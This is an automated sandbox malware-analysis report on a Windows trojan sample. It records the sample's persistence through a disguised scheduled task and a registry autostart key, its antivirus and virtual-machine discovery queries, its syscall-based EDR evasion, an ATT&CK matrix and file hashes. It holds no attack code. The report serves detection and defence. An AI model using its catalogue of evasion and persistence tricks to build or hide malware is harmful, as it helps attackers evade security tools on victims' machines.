Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeCode function: 23_2_00007FF684C84A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,23_2_00007FF684C84A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
Windows Management Instrumentation		1
Scheduled Task/Job		12
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
Modify Registry		LSASS Memory341
Security Software Discovery		Remote Desktop Protocol3
Clipboard Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		12
Virtualization/Sandbox Evasion		Security Account Manager12
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Image File Execution Options Injection		1
Registry Run Keys / Startup Folder		11
Disable or Modify Tools		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading		12
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Image File Execution Options Injection		1
Abuse Elevation Control Mechanism		Cached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Obfuscated Files or Information		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543318 Sample: SecuriteInfo.com.Variant.Gi... Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 43 Multi AV Scanner detection for submitted file 2->43 45 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->45 47 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->47 49 2 other signatures 2->49 8 SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe 9 6 2->8         started        process3 file4 41 C:\Users\Public\...\SppExtComObj.exe, PE32+ 8->41 dropped 51 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 8->51 53 Creates an undocumented autostart registry key 8->53 55 Drops large PE files 8->55 57 3 other signatures 8->57 12 SgrmBroker.exe 8->12         started        15 powershell.exe 23 8->15         started        17 cmd.exe 1 8->17         started        19 3 other processes 8->19 signatures5 process6 signatures7 59 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 12->59 61 Queries memory information (via WMI often done to detect virtual machines) 12->61 63 Found direct / indirect Syscall (likely to bypass EDR) 12->63 21 cmd.exe 12->21         started        65 Loading BitLocker PowerShell Module 15->65 23 WmiPrvSE.exe 15->23         started        25 conhost.exe 15->25         started        67 Uses schtasks.exe or at.exe to add and modify task schedules 17->67 27 conhost.exe 17->27         started        29 wusa.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 19->33         started        35 reg.exe 1 1 19->35         started        process8 process9 37 conhost.exe 21->37         started        39 schtasks.exe 21->39         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe21%ReversingLabsWin64.Trojan.GiantCerbu

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://gameplayapi.intel.com/api/games/getagsgames2/PSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
      		unknown
      https://gameplayapi.intel.com/api/games/getagsgamesettings2/BSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://pesterbdd.com/images/Pester.pngXzypowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            https://go.microsoft.copowershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://gameplayapi.intel.com/api/games/getagsgames2/HSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.microsoft.copowershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/uSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://gameplayapi.intel.com/api/games/downloadthumbnail/.dllYSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/QSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.microsoft.cpowershell.exe, 0000000C.00000002.1967236251.000002139A336000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/RSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://tst-gameplayapi.intel.com/api/games/getagsgames2/ySecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://gameplayapi.intel.com/api/games/getagsgamesettings2/SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlXzypowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://gameplayapi.intel.com/api/games/getagsgames2/ySecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://cacerts.digicKSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1683814431.00000245B10D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://github.com/Pester/PesterXzypowershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/BSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://gameplayapi.intel.com/api/games/getagsgamesettings2/jSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/ZSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://gameplayapi.intel.com/api/games/downloadthumbnail/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://tst-gameplayapi.intel.com/api/games/getagsgames2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://tst-gameplayapi.intel.com/api/games/getagsgames2/ZSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/RSgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgSgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC5F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACCAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://gameplayapi.intel.com/api/games/getagsgames2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://gameplayapi.intel.com/api/games/getagsgames2/YSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    No contacted IP infos

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1543318
                                                                                    Start date and time:2024-10-27 17:11:52 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 26s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                    Run name:Suspected VM Detection
                                                                                    Number of analysed new started processes analysed:30
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.evad.winEXE@27/6@0/0
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 65%
                                                                                    • Number of executed functions: 38
                                                                                    • Number of non-executed functions: 28
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.51.58.94
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, nexusrules.officeapps.live.com
                                                                                    • Execution Graph export aborted for target SppExtComObj.exe, PID 6848 because there are no executed function
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 2172 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • VT rate limit hit for: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    12:14:59API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                    17:15:54Task SchedulerRun new task: TMPSYSUPD path: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    No context

                                                                                    Domains

                                                                                    No context

                                                                                    ASNs

                                                                                    No context

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1510207563435464
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:NlllulgkLZ:NllU
                                                                                    MD5:C1AA1D28144A13E317F3F4D85AC26B7D
                                                                                    SHA1:2ADF74F16F1031DA80E1E096946EB8872F716876
                                                                                    SHA-256:EB50A98ECA168B1B64C7DB0C33AE77B83B84F492032BD1BCB26AFE571DBE2839
                                                                                    SHA-512:B92300874DD39C4304C852D59177D0E33A3A39D6ABB8DE5C86E9A2EC46268BC9E4AFD2BF3F1441D37F97E217EA296556EF2F9F62B346D0DDBF2EA9DB978B4CBE
                                                                                    Malicious:false
                                                                                    Preview:@...e.................................,..............@..........

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqoksxub.1dq.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
